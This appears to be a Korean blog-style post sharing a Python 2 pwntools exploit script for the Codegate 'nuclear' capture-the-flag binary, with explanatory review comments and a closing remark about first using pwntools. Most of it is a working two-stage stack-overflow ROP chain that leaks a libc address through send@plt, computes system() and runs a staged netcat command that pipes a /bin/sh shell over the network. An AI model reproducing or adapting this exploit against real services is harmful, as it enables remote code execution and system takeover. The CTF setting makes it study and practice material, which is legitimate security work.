

codegate nuclear pwn tools 사용

# Exploit script for the Codegate "nuclear" challenge binary, written against the
# Python 2 pwntools API (print statements, str payloads; it will not run unmodified
# on Python 3).
#
# Structure as visible below:
#   stage 1 -- overflow a stack buffer and return into send@plt so the service
#              writes recv's GOT slot back over the socket (libc address leak);
#   stage 2 -- overflow again, return into recv@plt to stage a command string in
#              .bss, then return into system() computed from the leak.
#
# Review note (defensive reading): every address here is a fixed 0x0804xxxx
# value, so the chain presupposes a non-PIE binary, and the frame is overwritten
# directly from a 512-byte filler, which suggests no stack canary sits between
# the buffer and the saved return address -- TODO confirm against checksec; PIE
# or a canary would invalidate the hard-coded layout, and the libc delta at
# `system_recv` ties the script to one specific libc build.
from pwn import *


# Parse the target binary from the working directory (symbols, PLT, GOT).
elf = ELF("./nuclear")

# NOTE(review): constructed but never used; the chain below is assembled by hand.
rop = ROP(elf)


# PLT stubs (callable from the ROP chain) and GOT slots (hold the resolved libc
# address once the function has been called) for recv and send.
recv_plt,send_plt = elf.plt['recv'], elf.plt['send']

recv_got,send_got = elf.got['recv'], elf.got['send']


# Hard-coded gadget: the name reads as pop;pop;pop;pop;ret -- presumably used to
# discard the four arguments of recv/send from the stack after each call (not
# derived from `rop` above; verify against the binary).
ppppr = 0x0804917C

# Hard-coded address inside the binary jumped to after the leak; presumably
# re-enters the code path that reads the next payload -- TODO confirm.
boom = 0x08048B5B


# NOTE(review): labels say "read_*" but the values printed are the recv_* ones;
# log text only, no effect on the chain.
print "read_plt : " + str(hex(recv_plt))

print "send_plt : " + str(hex(send_plt))

print "read_got : " + str(hex(recv_got))

print "send_got : " + str(hex(send_got))


# Target service (the challenge runs locally on port 1129 here).
conn = remote('localhost', 1129)


# First protocol step expected by the service.
payload = "launch\n"

conn.send(payload)


# Crude pacing between protocol steps rather than waiting for a prompt.
sleep(0.3)


# Second protocol step: a 19-digit value -- presumably a code the service asks
# for before the vulnerable read; what it checks is not visible here.
payload = "1234567890123456789\n"

conn.send(payload)


# Stage 1 frame overwrite: 512 bytes of filler, then p32(4) -- presumably restores
# a local (the socket descriptor, which also appears as the first argument of
# every send/recv below) that would otherwise be clobbered -- TODO confirm; then
# 12 more bytes up to the saved return address.
payload = "A" * 512

payload += p32(4)

payload += "A" * 8

payload += "B" * 4


# Saved return address -> send@plt, i.e. send(4, recv_got, 4, 0): the service
# writes the 4-byte GOT entry of recv (its resolved libc address) to fd 4.
payload += p32(send_plt) # ret

# "Return address" for send: pops the four arguments and returns into boom.
payload += p32(ppppr)

payload += p32(4)

payload += p32(recv_got)

payload += p32(4)

payload += p32(0)


# After the gadget pops the arguments, execution continues at boom with a fake
# return address ("AAAA") and p32(4) in the first argument slot.
payload += p32(boom)

payload += "AAAA"

payload += p32(4)


conn.send(payload)


# Consume the service's banner up to the known final line so the next 4 bytes
# read are exactly the leaked GOT value.
print conn.recvuntil("Sorry.. We can't stop this action.. G00D Luck!\n")


# Leaked address of recv in the remote libc (little-endian 32-bit).
recv_addr = u32(conn.recv(4))

print "recv_addr : " + hex(recv_addr)


# Distance between system and recv in the target's libc (system lies above recv
# in that build). Hard-coded from the challenge environment -- any other libc
# build has a different delta, so this is the most environment-specific constant.
system_recv = 4112


system_addr = recv_addr + system_recv


print "system_addr : " + hex(system_addr)


# Command string later handed to system(); it is staged into the binary's .bss
# at bss_addr (a fixed writable address in the non-PIE image).
cmd = "nc localhost 4567 | /bin/sh | nc localhost 4568"

bss_addr = 0x0804B080


# Stage 2 frame overwrite: identical layout to stage 1.
payload2 = "A" * 512

payload2 += p32(4)

payload2 += "A" * 8

payload2 += "B" * 4

# Saved return address -> recv@plt, i.e. recv(4, bss_addr, len(cmd), 0): reads
# the command string sent below into .bss.
payload2 += p32(recv_plt) # ret

payload2 += p32(ppppr)

payload2 += p32(4)

payload2 += p32(bss_addr)

payload2 += p32(len(cmd))

payload2 += p32(0)

# Then system(bss_addr) with "AAAA" as its fake return address.
payload2 += p32(system_addr)

payload2 += "AAAA"

payload2 += p32(bss_addr)


conn.send(payload2)


# Let the service reach the recv() in the chain before the command is sent.
sleep(0.3)


conn.send(cmd)


# Drain whatever the service returns; four fixed reads rather than a loop.
print conn.recv(1024)

print conn.recv(1024)

print conn.recv(1024)

print conn.recv(1024)


pwntools 처음 써봤는데 편한 부분도 있고 오히려 더 귀찮은 부분도 있는 것 같다

